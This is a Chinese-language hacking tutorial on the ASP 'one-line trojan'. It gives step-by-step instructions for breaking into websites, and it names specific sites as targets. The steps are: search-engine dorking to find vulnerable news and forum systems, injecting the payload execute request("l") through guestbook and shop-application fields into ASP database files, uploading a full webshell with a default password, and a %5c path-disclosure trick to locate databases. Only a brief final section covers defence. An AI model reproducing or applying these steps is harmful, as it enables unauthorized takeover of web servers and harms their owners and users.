一句話木馬全攻略

大家都知道入侵 網站拿Webshell的時候一般思路有備 份和上傳小馬然後寫大馬。然後比較多的就是用一句話來拿Webshell.但是對於新手。如何正確使用一句話呢?這就是本問講到的,請大家看下文
----------------------------------------------------------------------------------------------------------------------------------
實 例一:“一句話木馬入 侵 “EASYNEWS新聞管理系統”

“EASYNEWS新聞管理系統 v1.01 正式版”是在企業網站中非常常見的一套整站模版,在該網站系統的留言本組件中就存在着數據過濾不嚴漏洞,如果網站是默認路徑和默認文件名安裝的話,入侵者 可以利用該漏洞 直接上傳ASP木馬 程序控制整個網站服務器

Step1 搜索入侵目標

使用了“EASYNEWS新聞管理系統 v1.01 正式版”的網站,在網站頁面的底部版權聲明處,往往會有關鍵字符爲“www.52EASY.COM 版權所有”。只要在GOOGLE或百度中以該字符串爲關鍵詞進行搜索,就可以找到大量的入侵目標。

Step2 檢測入侵條件

在 這裏,我們以網站“http://www.qswtj.com/news/index.htm ” 爲例進行一次入侵檢測。“EASYNEWS新聞管理系統”網站的留言本數據庫文件默認是位於“/ebook/db/ebook.asp”,首先在瀏覽器地 址欄中輸入“http://www.qswtj.com/news/ebook/db/ebook.asp ”, 回車後在瀏覽器頁面中將顯示訪問留言本數據庫文件的返回信息。如果在頁面中顯示亂碼,則說明該網站的留言本數據庫文件沒有改名,可以進行入侵。

Step3 在數據庫中插入ASP後門

前面提到了該新聞系統的留言本插件存在過濾不嚴,因此我們可以通過提交發言,在數據庫中 插入“一句話木馬”服務端代碼:

在瀏覽器中訪問“http://www.qswtj.com/news/khly.htm ”, 打開提交留言頁面。在提交頁面中的“主頁”欄中,直接填寫“一句話木馬”服務端代碼,其它隨便填寫。確定後點擊“發表留言”按鈕,文章發表成功後,即可將 “一句話木馬”服務端代碼插入到留言本數據庫中了。

Step4 連接後門 上傳Webshell

由 於留言本數據庫文件“ebook.asp”是一個ASP文件,所以我們插入到數據庫文件中的ASP語句將會被執行。將“一句話木馬”客戶端中的提交地址改 爲留言本數據庫文件地址,然後用瀏覽器打開客戶端,在上方的輸入框中輸入上傳ASP木馬的保存路徑,在下面的輸入框中可以粘貼入其它的ASP木馬代碼,這 裏選擇的是桂林老兵網站管理助手ASP代碼。點擊提交按鈕後,剛纔粘貼的ASP木馬將被寫入到論壇 服務器中保存。

Step5 打開WEBSHELL

上傳的ASP木馬被保存到與數據庫文件同一WEB目錄下,文件名爲“temp.asp”,因此我們在IE瀏覽器 中打開頁面“http://www.qswtj.com/news/ebook/db/temp.asp ”, 輸入默認的密碼“gxgl.com”,就可以看到一個WEBSHELL了。

在Webshell中可以上傳其它的文件或者安裝木馬後門 、 執行各種命令等,網站的服務器已經掌握在我們的手中,可以爲所欲爲了。

實例二 “社區超市”入侵動網論壇

Step1 檢測入侵條件

以入侵論壇“http://www.bbsok.com/ ” 爲例。首先在瀏覽器地址欄中輸入“http://www.bbsok.com/data/shop.asp ”, 回車後在瀏覽器頁面中將顯示訪問"shop.asp"文件的返回信息。說明該論壇的社區超市數據庫文件沒有改名或刪除,可以進行入侵。

Step2 在數據庫中插入ASP後門

登錄論壇後,點擊頁面中的“娛樂”→“社區超市”,打開社區超市頁面。在該頁面中選擇商店申請,打開“商店 申請入駐”頁面“http://www.bbsok.com/z_shop_newshop.asp ”, 在頁面中填寫任意信息,注意在“商店招牌”欄中,添加剛纔的ASP代碼"〈%execute request("l")%〉"。確定後點擊“申請”按鈕進行提交,即可將ASP代碼保存在數據庫文件中了。

後面的步驟就與上面介紹的 一樣了,只需要用藍屏木馬連接數據庫文件“http://sdoygb.w2.dvbbs.net/data/shop.asp ”, 然後上傳WEBSHELL就可以控制論壇服務器了。

實例三 “一句話木馬”入侵未知網站

從上面的兩個例子,我們可以 看出利用“一句話木馬”入侵控制存在數據庫過濾不嚴漏洞 的網站,成功的前提是一定要知道網站的數據 庫地址。對於一些使用了未知網頁程序的網站,我們如何才能找到它的數據庫地址呢?這就要結合暴庫或者跨站之類的方法了,下面只是結合一個簡單的暴庫,介紹 一下利用一句話木馬入侵未知網站的方法。

Step1 暴庫得到數據庫路徑

以“http://bbs.dwself.com ”爲例。在瀏覽器中打開“http://bbs.dwself.com/join/listall.asp?bid=2 ”,將地址 欄中join後的/改爲%5c,在提交後的返回返回信息中可以看到網站數據庫地址:“’d:/wwwroot/shuilong/wwwroot /admin/adshuilonG!#).asp’”,數據庫文件名中加入了“#”符號,“#”符號在IE中執行時被解釋爲中斷符,要訪問該數據庫文件 則必須將“#”號變爲“23%”纔可以。因此數據庫文件的實際WEB地址爲“http://bbs.dwself.com/join/admin/adshuilonG!%23 ).asp”

Step2 註冊網站,插入“一句話木馬”

由於數據庫文件是ASP文件格式的,滿足入侵條件,因此現在我們需要將 “一句話木馬”插入到數據庫文件中去。

在網頁上點擊註冊網站按鈕,打開註冊鏈接“http://bbs.dwself.com/join/add.asp 過 濾了=step3&bid=3”,在資料填寫頁面處的站點名稱或地址中寫入“一句話木馬”服務端代碼,其它隨便填寫。然後點擊完成按鈕提交數據, 木馬服務端就被插入到數據庫文件中了。

最後只需要用藍屏木馬連接數據庫文件“http://bbs.dwself.com/join/admin/adshuilonG!%23 ).asp”, 然後上傳ASP木馬就可以控制該網站的服務器了。

“一句話木馬”的防範

要防範“一句話木馬”可以從兩方面進行,首先 是要隱藏網站的數據庫,不要讓攻擊者知道數據庫文件的鏈接地址。這就需要管理員在網頁程序中查被暴庫漏洞 , 在數據庫連接文件中加入容錯代碼等,具體的防暴庫方法在這裏就不作過多的講解了。

其次就是要防止用戶提交的數據未過濾漏洞,對用戶提交 的數據進行過濾,替換一些危險的代碼等。例如中國站長聯盟網站在出現該漏洞 後已經對網頁程序進行的修補,插入的ASP 代碼中的〈、〉和"等字符會被網頁程序轉換成其它字符,致使服務端代碼無法正常執行。

只要作好這兩方面的安全工作,“一句話木馬”雖然 無孔不入,但是面對這樣的網站系統也是無可奈何的了。

發表評論
所有評論
還沒有人評論,想成為第一個評論的人麼? 請在上方評論欄輸入並且點擊發布.
相關文章